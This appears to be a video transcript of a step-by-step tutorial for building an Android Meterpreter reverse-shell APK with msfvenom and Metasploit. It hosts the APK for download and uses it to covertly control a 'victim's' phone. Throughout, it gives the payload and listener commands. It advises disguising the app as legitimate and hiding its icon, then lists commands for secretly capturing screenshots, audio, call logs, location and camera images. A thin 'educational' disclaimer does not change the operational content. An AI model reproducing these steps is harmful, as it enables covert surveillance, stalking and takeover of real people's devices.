Do you know that a simple app can secretly access your camera, microphone, location, and even your files, all without your permission? In today's video, I'll show you how spies use payload apps to track users, and how you can learn this ethically for educational and security purposes. Let's get started.
Disclaimer: this video is made for educational purposes only. We do not promote or encourage any illegal activities.
First, let's open our Kali Linux inside a virtual machine. Once the system is loaded, we'll open the terminal. In the terminal, the first thing we need is our IP address. If config, this IP will be used to host our payload listener or HTTP server. After running the ifconfig command, you'll see your IP address listed under your network adapter, usually something like 192.168.0.104. This is the IP address we'll use to run our HTTP or HTTPS server. In your case, it will show your own IP address, so the IP might be different from mine. Now we'll go to a folder where we want to store our payload APK file. I'm selecting the Documents folder. From there, I'll open the terminal. In the terminal, we'll use the /venom command to create the environment for generating our payload APK file. Then press enter. Now we'll type platform Android / to specify that we are creating a payload for the Android platform. Now we'll type a Java / to set the architecture to Java, which is required for Android applications. Now we'll type p-android /meterpreter /reverse_TCP / to set the payload type as an Android meterpreter reverse TCP connection. To create the app, we'll use filename.apk / to specify the output file name for our payload APK. Now we'll set lhost to our IP address, the one we got earlier from the ifconfig command. So we'll write lhost equals your IP here. Lhost equals is our IP address. This is where the victim's device will connect back. You'll replace it with the IP you saw earlier using ifconfig. Now we'll set our port equals 4444. This tells the payload which port to connect to on our machine. It must match the same port we'll be listening on with Metasploit. Now press enter. The APK file will be generated and saved in the folder you selected earlier. Before starting the server, we'll type ls to check if our APK file has been successfully created in the folder. After the APK file is saved, we'll run a simple Python HTTP server to share the file. For that, we'll type python 3m http.server80. This will start a web server on port 80, allowing us to access and download the APK file from any device connected to the same network. When you do this in a real scenario, you should use your own server with a public IP. That way, the file can be accessed from any network. I'm just showing it here as a demo using a local setup. Now we'll run the console command to open Metasploit, which we'll use to listen for the connection from the victim's device. This will launch the Metasploit framework, which is the main tool we'll use to control the payload once the target installs the app. After launching Metasploit, the next step is to set up a listener to catch the connection from the payload we created. For this, we use a module called the multi-handler. We load it by typing use exploit /multi/handler. This multi-handler acts like a server that waits for any incoming connection from the malicious app running on the victim's device. It's very flexible and can handle multiple payload types, which makes it a powerful tool for penetration testers. Next, we need to tell Metasploit which payload to expect from the connection. Since we created an Android meterpreter reverse TCP payload, we'll set it by typing set payload android /meterpreter /reverse_TCP. This command configures the handler to listen for the exact type of connection our malicious APK will make when it's opened on the target device. Now, to check what settings we need to configure for the handler, we'll type show options. This command lists all the required and optional parameters for the module, such as lhost, port, and others. It helps us verify what needs to be set before running the exploit. Right now, you can see that roast is set to 4444, but lhost is not set yet. We need to set LOS to our local IP address, the same IP we found earlier with ifconfig. Set LOS 192.168.1.100. Replace with your actual IP address. This tells Metasploit where to listen for the incoming connection from the payload. After setting lhost, let's verify our settings by typing Show Options. This will display all current configurations, so we can confirm that lhost, lport, and other necessary parameters are correctly set before starting the listener. Once all the options are set correctly, it's time to start the listener. To do that, simply type run, or you can also use the command exploit. Both will start the handler, making Metasploit wait for the incoming connection from the target device. Now, using your server's IP address, you'll go to the victim's device and download your APK file. In some cases, the download will start automatically, while in others, the victim will have to give permission to download. This depends on how well you built your app. When installing, make sure to enable unknown sources on the victim's phone because apps outside the Play Store require this permission. Once the app is installed, it will automatically take all the required permissions without the victim even opening it. You don't even need to open the app manually for it to start working. Additionally, you can design the app to look exactly like a legitimate app on the phone so the victim won't suspect anything. You can also hide the app icon to make it invisible in the app drawer. All of this depends on your skill in building the app and creating the payload. Bypassing Android version restrictions is also possible, but due to security restrictions, some information might not be accessible. I've given you the basic idea. For everything else, you'll need to research and experiment on your own. After the victim installs the app, it will automatically connect back to your Metasploit console without the victim knowing. This means from your system, you can now see and control almost everything on the target device. You can access files, view messages, track location, record audio, take screenshots, basically full control depending on the permissions granted. Once the connection is established, you can start interacting with the device. To find out the current user ID on the victim's device, type getUID. This command will show the username under which the Meterpreter session is running, giving you information about the access level you have. When you're inside a Meterpreter session, here are some of the most useful commands you can use to control the victim's device. Screenshot. This command silently captures a snapshot of whatever is currently displayed on the victim's screen: apps, chats, photos, anything. Record_mic. This records audio from the victim's mic for 10 seconds and saves it to your system. Check_root. This checks if you have root access on the device. Root means full control. Dump_catalog. This pulls the victim's call history, incoming, outgoing, and missed calls. But here, mine shows nothing because the test device has no call records. Used right, these commands can reveal a lot. But always use them legally, for ethical hacking only. You can also find the victim's live location using the geolocation command. This command fetches the current GPS coordinates of the device, latitude and longitude. In some cases, it even gives a full address if location services are enabled. If you type help, you'll see many available commands. You can choose what kind of monitoring you want to perform depending on your needs. For example, you can secretly record the victim's video or audio without them knowing. To record audio, use the command record_mic D10. Here, 10 means 10 seconds. So I just recorded a 10-second audio clip from the victim's device. The audio recording is saved successfully. You can monitor many things from the victim's device. You can even see a list of the device's cameras. And you can take photos or record videos using any of those cameras remotely. If you want to learn many more cool and advanced hacking tricks like this, make sure to subscribe and hit the bell icon so you never miss an update. Also, drop your questions or topics you want me to cover in the comments below. I read every single one. Your support helps me create more helpful videos, so thank you in advance.